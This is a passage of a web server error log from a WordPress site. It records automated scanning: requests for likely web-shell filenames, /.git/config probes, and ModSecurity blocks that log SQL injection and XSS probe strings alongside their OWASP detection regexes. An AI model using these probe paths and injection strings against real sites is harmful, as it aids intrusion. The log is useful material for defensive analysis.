(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:08.309502 2024] [autoindex:error] [pid 29534:tid 139643722843904] [client 143.198.203.58:39496] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2024/05/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:08.545999 2024] [autoindex:error] [pid 28891:tid 139643960080128] [client 143.198.203.58:39498] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2024/06/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:09.214345 2024] [:error] [pid 29534:tid 139643815163648] [client 143.198.203.58:39502] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bypass.php [Fri Aug 16 23:43:10.196792 2024] [autoindex:error] [pid 29534:tid 139643756414720] [client 143.198.203.58:39506] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/11/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:10.434871 2024] [autoindex:error] [pid 29534:tid 139643840341760] [client 143.198.203.58:39508] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/02/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:10.671268 2024] [autoindex:error] [pid 29534:tid 139643968472832] [client 143.198.203.58:39510] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/05/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:10.909056 2024] [autoindex:error] [pid 29534:tid 139643798378240] [client 143.198.203.58:39512] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/01/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:11.156583 2024] [autoindex:error] [pid 29534:tid 139643857127168] [client 143.198.203.58:39514] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2021/12/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:11.327349 2024] [:error] [pid 28890:tid 139643722843904] [client 143.198.203.58:39516] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/mar.php [Fri Aug 16 23:43:11.394551 2024] [autoindex:error] [pid 29534:tid 139643823556352] [client 143.198.203.58:39518] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/12/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:11.569391 2024] [:error] [pid 28889:tid 139643968472832] [client 143.198.203.58:39520] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Aug 16 23:43:11.866912 2024] [autoindex:error] [pid 28891:tid 139643976865536] [client 143.198.203.58:39524] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2021/09/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:12.104048 2024] [autoindex:error] [pid 29534:tid 139643993650944] [client 143.198.203.58:39526] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2020/09/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:12.341171 2024] [autoindex:error] [pid 29534:tid 139643789985536] [client 143.198.203.58:39528] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2018/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:14.170208 2024] [autoindex:error] [pid 29534:tid 139643806770944] [client 143.198.203.58:39534] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/07/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:14.407221 2024] [autoindex:error] [pid 29534:tid 139643831949056] [client 143.198.203.58:39536] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2022/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:14.643643 2024] [autoindex:error] [pid 29534:tid 139643781592832] [client 143.198.203.58:39538] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2018/12/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:14.882447 2024] [autoindex:error] [pid 28891:tid 139643731236608] [client 143.198.203.58:39540] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/10/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:15.124039 2024] [autoindex:error] [pid 28890:tid 139643756414720] [client 143.198.203.58:39544] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2019/06/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:15.367746 2024] [autoindex:error] [pid 28890:tid 139643976865536] [client 143.198.203.58:39546] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/04/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:15.606597 2024] [autoindex:error] [pid 29534:tid 139643882305280] [client 143.198.203.58:39548] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2020/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:15.842856 2024] [autoindex:error] [pid 29534:tid 139643748022016] [client 143.198.203.58:39550] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2019/03/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:23.834010 2024] [autoindex:error] [pid 28891:tid 139643781592832] [client 143.198.203.58:39580] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2021/03/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:24.071150 2024] [autoindex:error] [pid 28891:tid 139643739629312] [client 143.198.203.58:39582] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2018/11/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:26.971100 2024] [autoindex:error] [pid 28890:tid 139643823556352] [client 143.198.203.58:39592] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2021/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:27.207796 2024] [autoindex:error] [pid 28889:tid 139643739629312] [client 143.198.203.58:39594] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/03/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:27.443527 2024] [autoindex:error] [pid 28889:tid 139643722843904] [client 143.198.203.58:39596] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:31.956341 2024] [autoindex:error] [pid 29534:tid 139643840341760] [client 143.198.203.58:39614] AH01276: Cannot serve directory /home/investig/public_html/images/icons/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:53.503139 2024] [autoindex:error] [pid 29534:tid 139643806770944] [client 143.198.203.58:39680] AH01276: Cannot serve directory /home/investig/public_html/vendor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:45:25.793451 2024] [autoindex:error] [pid 29534:tid 139643968472832] [client 143.198.203.58:39928] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2021/06/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:46:34.024254 2024] [authz_core:error] [pid 28891:tid 139643976865536] [client 143.198.203.58:40124] AH01630: client denied by server configuration: /home/investig/public_html/wp-content/plugins/akismet/views/ [Fri Aug 16 23:46:40.598987 2024] [autoindex:error] [pid 28891:tid 139643722843904] [client 143.198.203.58:40142] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:46:40.837892 2024] [autoindex:error] [pid 28891:tid 139643798378240] [client 143.198.203.58:40144] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/src/Core/Curve25519/Ge/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:46:41.075781 2024] [autoindex:error] [pid 28891:tid 139643823556352] [client 143.198.203.58:40146] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:46:51.623979 2024] [:error] [pid 28891:tid 139643806770944] [client 143.198.203.58:40180] PHP Fatal error: Uncaught Error: Call to undefined function load_textdomain() in /home/investig/public_html/wp-admin/includes/admin.php:16 [Fri Aug 16 23:46:51.624085 2024] [:error] [pid 28891:tid 139643806770944] [client 143.198.203.58:40180] Stack trace: [Fri Aug 16 23:46:51.624096 2024] [:error] [pid 28891:tid 139643806770944] [client 143.198.203.58:40180] #0 {main} [Fri Aug 16 23:46:51.624160 2024] [:error] [pid 28891:tid 139643806770944] [client 143.198.203.58:40180] thrown in /home/investig/public_html/wp-admin/includes/admin.php on line 16 [Fri Aug 16 23:50:44.073386 2024] [autoindex:error] [pid 28889:tid 139643840341760] [client 143.198.203.58:40854] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/06/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:50:45.812929 2024] [autoindex:error] [pid 28889:tid 139643815163648] [client 143.198.203.58:40862] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/edit-widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/08/16 23:50:50 [error] 28847#28847: *519363 "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/colors/index.html" is not found (2: No such file or directory), client: 143.198.203.58, server: investigacionperu.com, request: "GET /.well-known/pki-validation/colors/ HTTP/1.1", host: "investigacionperu.com" [Fri Aug 16 23:51:05.500577 2024] [autoindex:error] [pid 29534:tid 139643764807424] [client 143.198.203.58:40924] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/block/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:51:07.055825 2024] [autoindex:error] [pid 28889:tid 139643764807424] [client 143.198.203.58:40930] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2024/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:51:10.369078 2024] [autoindex:error] [pid 29534:tid 139643798378240] [client 143.198.203.58:40942] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/avatar/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:51:13.631989 2024] [autoindex:error] [pid 29534:tid 139643815163648] [client 143.198.203.58:40952] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/shortcode/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:55:34.156029 2024] [:error] [pid 29534:tid 139643789985536] [client 143.198.203.58:41388] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/Newsupway.php [Fri Aug 16 23:55:37.145957 2024] [:error] [pid 28890:tid 139643806770944] [client 143.198.203.58:41394] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/webdb.php [Fri Aug 16 23:55:47.078118 2024] [:error] [pid 28889:tid 139643815163648] [client 143.198.203.58:41412] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cux.php [Fri Aug 16 23:56:15.439056 2024] [:error] [pid 29534:tid 139643756414720] [client 143.198.203.58:41456] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/set.php [Fri Aug 16 23:56:37.260861 2024] [:error] [pid 28890:tid 139643960080128] [client 143.198.203.58:41488] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/myip.php [Fri Aug 16 23:58:17.263510 2024] [:error] [pid 29534:tid 139643873912576] [client 143.198.203.58:41660] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/gif.php [Fri Aug 16 23:58:25.907490 2024] [:error] [pid 28889:tid 139643848734464] [client 143.198.203.58:41680] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bless.php [Fri Aug 16 23:59:03.992432 2024] [:error] [pid 28889:tid 139643815163648] [client 143.198.203.58:41754] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bless1.php [Fri Aug 16 23:59:38.375239 2024] [:error] [pid 28889:tid 139643748022016] [client 143.198.203.58:41806] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/1.php [Fri Aug 16 23:59:40.109584 2024] [:error] [pid 28890:tid 139643865519872] [client 143.198.203.58:41810] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/inputs.php [Fri Aug 16 23:59:43.214368 2024] [:error] [pid 29534:tid 139643722843904] [client 143.198.203.58:41818] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/webdb.php [Sat Aug 17 00:07:34.031532 2024] [authz_core:error] [pid 29534:tid 139643823556352] [client 143.198.203.58:42538] AH01630: client denied by server configuration: /home/investig/public_html/wp-content/plugins/akismet/akismet.php [Sat Aug 17 00:09:24.931497 2024] [authz_core:error] [pid 29534:tid 139643976865536] [client 143.198.203.58:42706] AH01630: client denied by server configuration: /home/investig/public_html/wp-content/plugins/akismet/views/config.php [Sat Aug 17 00:11:42.022818 2024] [:error] [pid 28891:tid 139643985258240] [client 143.198.203.58:42934] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwenty/404.php:10 [Sat Aug 17 00:11:42.022916 2024] [:error] [pid 28891:tid 139643985258240] [client 143.198.203.58:42934] Stack trace: [Sat Aug 17 00:11:42.022930 2024] [:error] [pid 28891:tid 139643985258240] [client 143.198.203.58:42934] #0 {main} [Sat Aug 17 00:11:42.023011 2024] [:error] [pid 28891:tid 139643985258240] [client 143.198.203.58:42934] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/404.php on line 10 [Sat Aug 17 00:15:39.041375 2024] [:error] [pid 28891:tid 139643739629312] [client 143.198.203.58:43298] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/worksec.php [Sat Aug 17 00:15:39.525143 2024] [:error] [pid 28891:tid 139643848734464] [client 143.198.203.58:43300] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php [Sat Aug 17 00:15:39.765896 2024] [:error] [pid 28891:tid 139643960080128] [client 143.198.203.58:43302] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bless.php [Sat Aug 17 00:15:40.006486 2024] [:error] [pid 28891:tid 139643764807424] [client 143.198.203.58:43304] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile_(2).php [Sat Aug 17 00:15:40.247161 2024] [:error] [pid 28889:tid 139643968472832] [client 143.198.203.58:43306] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-admin.php [Sat Aug 17 00:15:40.488235 2024] [:error] [pid 28891:tid 139643882305280] [client 143.198.203.58:43308] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/termps.php [Sat Aug 17 00:15:40.729112 2024] [:error] [pid 29534:tid 139643764807424] [client 143.198.203.58:43310] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/options.php [Sat Aug 17 00:15:40.969751 2024] [:error] [pid 28891:tid 139643993650944] [client 143.198.203.58:43312] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/db-update.php [Sat Aug 17 00:15:41.210825 2024] [:error] [pid 28891:tid 139643985258240] [client 143.198.203.58:43314] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Sat Aug 17 00:15:41.451840 2024] [:error] [pid 28891:tid 139643781592832] [client 143.198.203.58:43316] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/amaxx.php [Sat Aug 17 00:15:41.692817 2024] [:error] [pid 28891:tid 139643798378240] [client 143.198.203.58:43318] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/load.php 2024/08/17 02:25:55 [error] 28846#28846: *521424 access forbidden by rule, client: 83.147.52.49, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/08/17 03:33:34 [error] 28847#28847: *521707 access forbidden by rule, client: 106.75.47.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com:443" 2024/08/17 06:23:56 [error] 25409#25409: *522390 access forbidden by rule, client: 106.75.164.40, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com:443" 2024/08/17 09:30:00 [error] 25410#25410: *523322 access forbidden by rule, client: 83.147.52.49, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/08/17 12:47:40 [error] 25410#25410: *526677 access forbidden by rule, client: 195.178.110.35, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/08/17 16:42:52 [error] 25410#25410: *527895 access forbidden by rule, client: 83.147.52.49, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sun Aug 18 00:50:38.243812 2024] [:error] [pid 26175:tid 140111018682112] [client 92.51.2.78:60596] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'][ ]*(([^a-z0-9~_:\\\\' ])|(in)).+?\\\\(.*?\\\\))" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "506"] [id "973335"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: ').\\x22\\x22(() found within ARGS:ver: ()').\\x22\\x22(()"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGLrkusHEVNaz1QkYN6PAAAAMw"] [Sun Aug 18 00:54:43.062035 2024] [:error] [pid 25551:tid 140111174412032] [client 92.51.2.78:60644] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 8177= found within ARGS:ver: ) AND 8177=4497 AND (2263=2263"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGMoySCXpUXSc3dPnIU5QAAAII"] [Sun Aug 18 00:54:43.202108 2024] [:error] [pid 25551:tid 140110993504000] [client 92.51.2.78:60646] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b 